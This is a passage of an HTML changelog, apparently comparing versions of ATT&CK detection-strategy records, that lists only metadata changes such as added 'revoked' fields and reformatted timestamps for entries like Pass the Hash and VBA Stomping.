collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.697000+00:00</td></tr></tbody></table></details><hr><h4>[DET0388] Detection Strategy for T1548.002 – Bypass User Account Control (UAC)</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.694000+00:00</td></tr></tbody></table></details><hr><h4>[DET0409] Detection Strategy for T1550.002 - Pass the Hash (Windows)</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.678000+00:00</td></tr></tbody></table></details><hr><h4>[DET0352] Detection Strategy for T1550.003 - Pass the Ticket (Windows)</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.679000+00:00</td></tr></tbody></table></details><hr><h4>[DET0467] Detection Strategy for TLS Callback Injection via PE Memory Modification and Hollowing</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.686000+00:00</td></tr></tbody></table></details><hr><h4>[DET0393] Detection Strategy for Temporary Elevated Cloud Access Abuse (T1548.005)</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.672000+00:00</td></tr></tbody></table></details><hr><h4>[DET0403] Detection Strategy for Traffic Duplication via Mirroring in IaaS and Network Devices</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.680000+00:00</td></tr></tbody></table></details><hr><h4>[DET0012] Detection Strategy for VBA Stomping</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.680000+00:00</td></tr></tbody></table></details><hr><h4>[DET0448] Detection Strategy for VDSO Hijacking on Linux</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.689000+00:00</td></tr></tbody></table></details><hr><h4>[DET0199] Detection Strategy for Virtual Machine Discovery</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.683000+00:00</td></tr></tbody></table></details><hr><h4>[DET0339] Detection Strategy for Weaken Encryption on Network Devices</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.695000+00:00</td></tr></tbody></table></details><hr><h4>[DET0494] Detection Strategy for Weaken Encryption: Disable Crypto Hardware on Network Devices</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.673000+00:00</td></tr></tbody></table></details><hr><h4>[DET0243] Detection Strategy for Weaken Encryption: Reduce Key Space on Network Devices</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.690000+00:00</td></tr></tbody></table></details><hr><h4>[DET0058] Detection Strategy for Web Service: Dead Drop Resolver</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.681000+00:00</td></tr></tbody></table></details><hr><h4>[DET0536] Detection Strategy for Wi-Fi Networks</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.698000+00:00</td></tr></tbody></table></details><hr><h4>[DET0254] Detection Strategy of Transmitted Data Manipulation</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.671000+00:00</td></tr></tbody></table></details><hr><h4>[DET0311] Detection for Spoofing Tool UI across OS 